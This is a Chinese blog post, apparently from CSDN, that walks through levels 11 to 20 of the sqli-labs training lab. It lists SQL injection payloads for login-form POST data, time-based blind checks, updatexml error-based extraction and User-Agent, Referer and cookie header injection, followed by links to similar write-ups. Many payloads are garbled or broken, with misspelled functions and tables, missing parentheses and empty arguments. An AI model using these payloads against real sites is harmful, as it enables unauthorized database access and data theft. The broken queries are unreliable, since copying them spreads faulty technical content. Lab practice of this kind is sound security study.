sql注入Less11-20

最新推荐文章于 2022-10-11 09:37:00 发布
最新推荐文章于 2022-10-11 09:37:00 发布
阅读量347 收藏
点赞数
分类专栏: SQL 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62420492/article/details/122006041
版权

Less-11(POST)

1.先登录 ,在表格中输入admin admin
在这里插入图片描述
登录成功后为下图

在这里插入图片描述
2.在post data中输入以下

uname='&passwd=1&submit=submit//返回的结果显示存在sql语法错误,证明存在注入漏洞
uname=a' or 1=1 #&passwd=a&submit=submit//登陆成功,可以验证存在注入漏洞
uname=a' order by 3#&passwd=a&submit=submit//判断出只有两列
uname=a&passwd=a' union select database(),2 #&submit=submit//查询到当前数据库为security
uname=a' union select 1,(select schema_name from information_schemata limit1,1)#
uname=a'union select1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479#passwd=a&submit=submit//可以得到security数据库中的所有表的信息

Less-12

uname=1&password=1")报错其他操作和Less-11相同

Less-13

uname=admin&passwd=admin&submit=Submit//只显示登录成功。但不显示其他信息
uname='&passwd=a&submit=Submit//构造1') or 1-1#
uname=admin') order by 2 # &passwd=admin&submit=Submit//只显示登录成功,不显示其他信息,考虑盲注
unmae=admin') or if(length(database())=8,1,sleep(5)# &passwd=admin&submit=Submit //可得到数据库的长度为8
uname=admin&passwd=ain')or left(database(),1)>'a'#submit=Submit 
uname=admin&passwd=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a'#&submit=Submit

Less-14

与less-13的区别为输入内容被放到双引号中,其余相同

Less-15

uname=admin&passwd=a''&submit=Submit//构造1'' or 1-1#
uname=adminadmin&passwd=admiand'or if(length()>1000,1,sleep(5))#submit=Submit//判断长度
uname=adminadmin&passwd=admiand' or if(length()>1000,1,sleep(5))#&submit=Submit
uname=adminadmin&passwd=admiand' or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&submit=Submit //使用Less-13同样的方法

Less-16

与less-15的区别为1’’)其余相同

Less-17

使用了get_nagic_guotes_gpc name和password 分开验证

unmae=admin&passwd=adm' and updatexm(1,concat(0x7e,(select table_name from information_schema,tables where table_schema='security'limit 0,1),0x7e)#&submit=Submit 
uname=admin&passwd=adm' and updatexm(1,concat(0x7e,(select column_name from information_schemta.columns where table_name='users'limit0,1),0x7e),1)#&submit=Submit

Less-18

' and updatexm(1,concat(0x7e,(database(),0x7e),1)and1'='1
//登陆失败显示IP地址
//登录成功显示IP地址和user-Agent
$insert='INSERT INTO'security''uagents'('uagent','ip_address','username'VALUES'$uagent','$IP',$UNAME)";
//闭合操作为' or updatexm(1,concat(0x7e,(database())),1) and '1'='1
//剩余步骤通过MYSQL注入语句操作即可

Less-19

//登陆成功显示的是Refer信息
//登陆失败没有回显信息
$insert='INSERT INTO''security'.'referers'('referer','ip_adress') VALUES('$uagent','$IP')"
//闭合操作为 ' or updatexm(1,concat(0x7e,(database(),1) and '1'='1

Less-20

//登录成功之后会显示cookie
//登陆失败后会显示失败信息
$sql='SELECT * FROM users WHERE username='$cookee' LIMIT0,1"//登陆成功后后台会将username 放入cookie中,再次登录的时候,只要cookie没有过期,就会去cookie里面取值,然后进行查询
'union select 1,2,database()#
//其余步骤为常见的注入过程
小杨想睡觉.
关注
专栏目录
SQLi LABS Less-11 联合注入+报错注入
wangyuxiang946的博客
06-27 1万+
sqli第十一关,sqli-labs less-11sqlilabs less11
sqli-labs:less-11/12 简单SQL注入和身份验证漏洞综合
Zeker62的博客
08-31 219
这两个靶场是一样的题,我就拿less-12说事了吧 首先,尝试胡乱输入密码进行测试: 发现存在报错,这时用adminadmin这个正确的账号密码进行测试(1~10前面的题目告诉了) 发现有着正确的提示: 但是还不够,我们尝试在username后面加上单引号: 发现正常报错 加上双引号尝试(没输入密码) 存在报错,这个就是SQL注入点:You have an error in your SQL ...
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 2930
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-labs (less-11)
kukudeshuo的博客
03-09 2697
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs (less-20)
kukudeshuo的博客
03-11 308
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
SQL 注入天书.pdf
08-06
Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本攻击手法。 **盲注讲解(Blind Injection)** Background-2介绍了盲注,这是一种更为隐蔽的注入方式,攻击者在...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
第十一节 HTTP头中的SQL注入-01
最新发布
09-15
【网络协议 SQL注入详解】 在网络安全领域,HTTP头中的SQL注入是一种常见的攻击手段,它利用了网站应用程序在处理HTTP请求头信息时的不安全性。随着安全意识的提高,许多开发者开始对用户输入的数据进行过滤,以...
sql注入之手工注入示例详解
09-10
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的参数直接构造SQL查询语句时。手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行...
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 607
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库中表名。
生命在于折腾——SQL注入的实操(三)less11-15
易水哲的博客
08-20 570
本篇文章是sql-lib的11-15关。
sql注入sqli-labs(less11-less20)
小宇的web博客
03-17 793
sql注入sqli-labs(less11-less20)特详解 less11 1.输入用户名和密码adminadmin查看输出 2.利用burpsuite来进行抓包(这个抓包软件需要java环境自行配置和下载直接度娘,burp下载后还需要自行把火狐浏览器的代理服务器配置)。 3.打开burpsuite来进行抓包(uname=admin&passwd=admin&submit=Submit这个就是抓包的数据) 4.将这个数据复制后打开火狐浏览器,复制到指定的位置。(这时必须关闭bu
sqli-labs ————less -11(POST注入)
Fly_鹏程万里
05-11 3541
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
通过sqli-labs学习sql注入——基础挑战之less11-22
热门推荐
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
【less-11】基于SQLI的POST字符型SQL注入
未名编程
07-17 538
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POST型SQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
Sqli-labs之Less-11和Less-12
→_→
04-02 1736
Less-11 POST - 基于错误的- 单引号- 字符型 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post类型的,那么post与ge...
sqli-labs Less-20(cookie注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 340
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户adminadmin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
sqli-labs————less 20
Fly_鹏程万里
05-12 1626
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
SQL注入实战:sqli-labs实验详解
在题目“less-1”中,通过将?id=1更改为?id=1'and1=1---,观察是否能触发错误或改变输出,来判断是否存在注入。当1=1变为1=2时,如果没有返回任何信息,这通常表明存在注入的可能性。接着,通过测试发现单引号(')是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值